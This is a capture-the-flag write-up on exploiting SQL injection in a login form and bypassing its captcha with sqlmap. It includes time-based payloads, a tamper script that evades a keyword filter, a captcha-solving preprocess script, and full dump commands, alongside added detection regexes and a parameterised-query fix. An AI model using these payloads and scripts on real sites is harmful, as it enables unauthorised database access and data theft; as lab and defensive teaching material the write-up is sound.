Exploit SQL Injection and bypass captcha with SQLMAP

Kenzy challenge (Cyber wargames 2022)

SQL Injection + Captcha bypass

Steps to solve this challenge

1. Detect SQL injection

Responses from the login endpoint while probing the username field:

  {"Username":"admin","status":"Invalid username or password"}
  {"Username":"admin'","status":"statement error"}
  {"Username":"admin","status":"Invalid username or password"}

Time-based payloads tried on the username field:

  admin'or sleep(5) --
  admin'sleep(5)--
  admin'oorr/**/sleep(5)#
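From the defender's side, the probes above leave a recognisable trail: a stray quote, a quote immediately followed by a keyword, doubled keywords meant to survive a strip-once filter, inline comments used as whitespace, and time-based functions. The following is an added example, not part of the original write-up, that scans constructed application log lines (the log format, the indicator names and the sample lines are all assumptions) for exactly those patterns:

```python
# Added example (not from the original write-up): flag the injection patterns
# seen in this challenge in constructed application log lines. The log format
# ("username=<urlencoded>") and the indicator names are assumptions.
import re
from urllib.parse import unquote_plus

# Each indicator maps to one trait of the probes shown in the write-up.
INDICATORS = {
    "single_quote":       re.compile(r"'"),
    "quote_then_keyword": re.compile(r"'\s*(?:or|and|union|select)\b", re.I),
    "doubled_keyword":    re.compile(r"\b(?:oorr|anandd)\b", re.I),
    "inline_comment":     re.compile(r"/\*.*?\*/"),
    "time_based":         re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "comment_terminator": re.compile(r"(?:--|#)\s*$"),
}

# Constructed log format: the login handler records the raw, URL-encoded
# username it received (real access logs do not carry POST bodies).
LOG_RE = re.compile(r"username=([^&\s]+)")


def scan_value(value):
    """Return the names of every indicator that matches one submitted username."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


def scan_log(lines):
    """Return (decoded_username, indicators) for every log line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        value = unquote_plus(m.group(1))   # undo form encoding before matching
        found = scan_value(value)
        if found:
            hits.append((value, found))
    return hits


# Constructed sample log: the write-up's probes, form-encoded as a client sends them.
SAMPLE_LOG = [
    "10.0.0.5 POST /login.php username=admin&password=x",
    "10.0.0.5 POST /login.php username=admin%27&password=x",
    "10.0.0.5 POST /login.php username=admin%27or+sleep%285%29+--&password=x",
    "10.0.0.5 POST /login.php username=admin%27sleep%285%29--&password=x",
    "10.0.0.5 POST /login.php username=admin%27oorr%2F%2A%2A%2Fsleep%285%29%23&password=x",
]

if __name__ == "__main__":
    for value, found in scan_log(SAMPLE_LOG):
        print("%-28r -> %s" % (value, ", ".join(found)))
```

The doubled-keyword and inline-comment rules are high confidence on their own; a single quote alone is weak (names like O'Brien are legitimate) and is better scored together with the "statement error" responses the server returned for the same session.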

2. Second part: captcha bypass

Inspecting the page source (Inspect Element) revealed the path of the captcha script, /scripts/captcha.php.

Notice:

Scripting part

I chose to solve the challenge with SQLMap: a tamper script to get past the keyword filter, and a preprocess script that fetches a fresh captcha and attaches it to every request.

  # tamper-bypass-and-or.py
  from lib.core.enums import PRIORITY
  import re

  __priority__ = PRIORITY.LOWEST


  def dependencies():
      pass


  def tamper(payload, **kwargs):
      """Double OR/AND so that a filter stripping them once turns the payload back into valid SQL.
      Note: this also rewrites any other token containing "or" or "and" (e.g. ORDER, FLOOR)."""
      retVal = payload
      if payload:
          retVal = re.sub(r"(?i)(or)", 'oorr', retVal)
          retVal = re.sub(r"(?i)(and)", 'anandd', retVal)
      return retVal
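The tamper script works only because the target strips blacklisted keywords in a single pass, so removing "or" from "oorr" leaves "or" behind. The following is an added example, not part of the write-up or of sqlmap, that reproduces that strip-once filter against an in-memory SQLite login (the filter, the table, the user and the boolean payload are assumptions; the sleep() payload from the write-up is replaced by 1=1 because SQLite has no sleep()). It shows the bypass, shows that stripping until stable still breaks legitimate input and still leaks statement errors, and shows the actual fix: a parameterised query, which needs no keyword filter at all.

```python
# Added example (not from the original write-up): strip-once keyword filter
# versus a parameterised query. Filter rules, table and user are assumptions.
import re
import sqlite3


def naive_filter(value):
    """Strip-once blacklist: remove OR, AND and spaces in one pass (assumed to
    match the challenge, since the working payload needed oorr and /**/)."""
    value = re.sub(r"(?i)or", "", value)
    value = re.sub(r"(?i)and", "", value)
    return value.replace(" ", "")


def recursive_filter(value):
    """Strip until nothing changes: defeats doubling, but is still a blacklist."""
    while True:
        new = naive_filter(value)
        if new == value:
            return value
        value = new


def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return db


def login_vulnerable(db, username, password, keyword_filter=naive_filter):
    """Blacklist filter + string concatenation: the pattern the tamper script defeats.
    Returns the same three statuses the challenge endpoint exposed."""
    username = keyword_filter(username)
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "statement error"       # the oracle the write-up used for --not-string
    return "ok" if row else "invalid"


def login_safe(db, username, password):
    """Parameterised query: the input is data, never SQL, so no filter is needed."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return "ok" if row else "invalid"


# Constructed payload in the shape of the write-up's working one (doubled OR,
# inline comments as whitespace, comment terminator), boolean instead of sleep().
PAYLOAD = "admin'/**/oorr/**/1=1--"

if __name__ == "__main__":
    db = setup_db()
    print("after strip-once filter :", naive_filter(PAYLOAD))
    print("vulnerable login        :", login_vulnerable(db, PAYLOAD, "x"))
    print("strip-until-stable      :", login_vulnerable(db, PAYLOAD, "x", recursive_filter))
    print("collateral damage       :", naive_filter("Andorra"))
    print("parameterised login     :", login_safe(db, PAYLOAD, "x"))
```

Stripping until stable closes this particular bypass but turns the legitimate username "Andorra" into "ra" and still answers attacker input with a distinguishable "statement error", which is exactly the oracle a boolean-based blind run needs. Parameterisation removes the whole class.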
  # solve-captcha-preprocess.py
  import base64
  import re
  import requests

  # Session cookie of the challenge instance: the captcha is tied to this PHP session.
  COOKIES = {'PHPSESSID': 'dvtd7c1gss3oldmp4obam7hu6p'}
  CAPTCHA_URL = "http://34.175.249.72:60001/scripts/captcha.php"


  def solve_captcha():
      """Fetch captcha.php and return the encoded captcha value embedded in it."""
      try:
          response = requests.get(CAPTCHA_URL, cookies=COOKIES, verify=False)
      except Exception as e:
          print(e)
          return None
      # The response carries a line starting with "CAPTCHA"; slice off the label
      # and the trailing character to keep only the (double base64) encoded value.
      return re.findall(r"CAPTCHA.*", response.text)[0][10:-1]


  def preprocess(req):
      """sqlmap --preprocess hook: append a freshly solved captcha to every POST body."""
      captcha = solve_captcha()
      if captcha is None:
          return
      captcha = base64.b64decode(base64.b64decode(captcha).decode('utf-8')).decode('utf-8')
      if req.data:
          req.data += b'&captcha=' + captcha.encode("utf-8")
Detection run (boolean-based blind, banner retrieval):

  python3 /usr/bin/sqlmap -r req-sqli.txt --banner --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py -p username --preprocess solve-captcha-preprocess.py --technique=B --not-string="statement error" --level=2

  -r : Load HTTP request from a file
  --banner : Retrieve DBMS banner
  --prefix : Injection payload prefix string
  --suffix : Injection payload suffix string
  --batch : Never ask for user input, use the default behaviour
  --tamper : Use given script(s) for tampering injection data
  --preprocess : Use given script(s) for preprocessing (request)
  --technique : SQL injection techniques to use (B = boolean-based blind)
  --not-string : String to match when query is evaluated to False
  --level : Level of tests to perform (1-5)
  -p : Testable parameter

Dump run (extract the flag column from the solve table of the kenzy database, routed through a local proxy to watch the traffic):

  python3 /usr/bin/sqlmap -r req-sqli.txt --dbms=MySQL -D kenzy -T solve -C flag --dump --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py --proxy="http://127.0.0.1:8080" -p username --preprocess solve-captcha-preprocess.py --flush-session --technique=B --not-string="statement error" --level=2

  --dbms : Force back-end DBMS to the given value
  -D : DBMS database to enumerate
  -T : DBMS database table(s) to enumerate
  -C : DBMS database table column(s) to enumerate
  --dump : Dump DBMS database table entries
  --proxy : Use a proxy to connect to the target URL
  --flush-session : Flush session files for the current target

Cyber Security Engineer